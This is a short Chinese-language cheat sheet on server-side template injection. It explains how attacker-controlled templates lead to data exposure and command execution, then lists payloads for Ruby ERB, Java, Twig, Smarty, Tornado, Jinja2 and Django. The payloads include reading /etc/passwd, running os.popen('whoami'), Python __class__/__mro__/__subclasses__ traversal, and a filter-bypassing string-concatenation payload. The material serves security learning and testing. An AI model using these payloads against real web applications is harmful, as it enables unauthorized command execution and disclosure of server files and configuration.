模板引擎用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成网页、电子邮件等。模板引擎通过使用代码构造(如条件语句、循环等)处理上下文数据,允许在模板中使用强大的语言表达式,以呈现动态内容。如果攻击者能够控制要呈现的模板,则他们将能够注入可暴露上下文数据,甚至在服务器上运行任意命令的表达式。
简单的数学表达式,{{ 7+7 }} => 14
字符串表达式 {{ "ajin" }} => ajin
Ruby
<%= 7 * 7 %><%= File.open('/etc/passwd').read %>Java
${7*7}Twig
{{7*7}}Smarty
{php}echoid;{/php}AngularJS
$eval('1+1')Tornado
引用模块{% import module %}=> {% import os %}{{ os.popen("whoami").read() }}Flask/Jinja2
{{ config.items() }}{{''.__class__.__mro__[-1].__subclasses__()}}Django
{{ request }}{% debug %}{% load module %}{% include "x.html" %}{% extends "x.html" %}python中的新式类(即显示继承object对象的类)都有一个属性 __class__用于获取当前实例对应的类,例如"".__class__就可以获取到字符串实例对应的类
python中类对象的 __mro__ 属性会返回一个tuple对象,其中包含了当前类对象所有继承的基类,tuple中元素的顺序是MRO(Method Resolution Order) 寻找的顺序。
保存了函数所有的所有全局变量,在利用中,可以使用 __init__获取对象的函数,并通过 __globals__获取 file os等模块以进行下一步的利用
python的新式类都保留了它所有的子类的引用,__subclasses__()这个方法返回了类的所有存活的子类的引用(是类对象引用,不是实例)。
因为python中的类都是继承object的,所以只要调用object类对象的 __subclasses__()方法就可以获取想要的类的对象。
request['__cl'+'ass__'].__base__.__base__.__base__['__subcla'+'sses__']()[60]
